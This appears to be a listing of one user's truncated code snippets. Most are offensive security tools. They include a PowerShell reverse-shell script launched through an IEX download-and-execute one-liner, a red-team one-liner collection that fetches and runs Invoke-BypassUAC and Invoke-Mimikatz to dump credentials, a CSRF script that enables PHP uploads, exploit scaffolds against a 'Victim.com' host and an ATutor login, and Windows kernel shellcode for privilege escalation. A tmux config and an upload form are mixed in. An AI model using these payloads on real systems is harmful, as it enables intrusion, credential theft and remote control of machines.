amriunix

# Invoke-Go: REV-PSH
# powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://<URL>/Invoke-Go.ps1');Invoke-Go -Back -IPAddress 192.168.216.129 -Port 443"
function Invoke-Go 
{ 
    [CmdletBinding(DefaultParameterSetName="back")] Param(

        [Parameter(Position = 0, Mandatory = $true, ParameterSetName="back")]
        [Parameter(Position = 0, Mandatory = $false, ParameterSetName="onit")]
        [String]
        $IPAddress,

amriunix

#!/usr/bin/python

import zipfile
from cStringIO import StringIO

def _build_zip():
    f = StringIO()
    z = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED)
    z.writestr('folder/file.txt', 'This is just a text file!')
    z.writestr('code.php', '<?php phpinfo(); ?>')

amriunix

#!/usr/bin/env python3
from http.server import HTTPServer, SimpleHTTPRequestHandler, test
import sys

class CORSRequestHandler (SimpleHTTPRequestHandler):
    def end_headers (self):
        self.send_header('Access-Control-Allow-Origin', '*')
        SimpleHTTPRequestHandler.end_headers(self)

if __name__ == '__main__':

amriunix

function updateConfig(csrf) {
    xhr = new XMLHttpRequest();
    xhr.open('POST', '/application/vulnerable/to/fileUpload/settings', true);
    xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
    xhr.withCredentials = true;
    configPayload = 'save=1&user=admin&allowFileUpload=php&csrf=' + csrf;
    xhr.send(configPayload);
}

function getCSRF() {

amriunix

#!/usr/bin/python3

from flask import Flask, request
import requests
import base64
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

URL = 'http://Victim.com/vuln.php'
Host = 'Victim.com'

amriunix

#!/usr/bin/python3

import threading
import time
import requests
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

URL = 'http://192.168.25.130:9090/login.php'
Host = 'atutor'
Users = ['Guest','Admin','Test']

amriunix

[bits 64]
global _start

section .text

_start:
mov r9, qword [gs:0x188]     ; Pointing at _KTHREAD structure
mov r9, qword [r9 + 0x220]   ; Pointing at _KPROCESS/_EPROCESS structure
mov r8, qword [r9 + 0x3e8]   ; Saving the Parent PID in r8 / you can change it directly with a PID value from your choice !
mov rax, r9                  ; Saving the _KPROCESS/_EPROCESS address

amriunix

# Description: 
#    Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.

# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"

# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

# Import Mimikatz Module to run further commands

amriunix

<!DOCTYPE html>
<html>
<head>
  <title>Upload your files</title>
</head>
<body>
  <form enctype="multipart/form-data" action="upload.php" method="POST">
    <p>Upload your file</p>
    <input type="file" name="file"></input><br />
    <input type="submit" value="Upload"></input>

amriunix

# 0 is too far from ` ;)
set -g base-index 1

# Remap prefix
set -g prefix C-a
bind C-a send-prefix
unbind C-b

# Quality of the life stuff
set -g history-limit 10000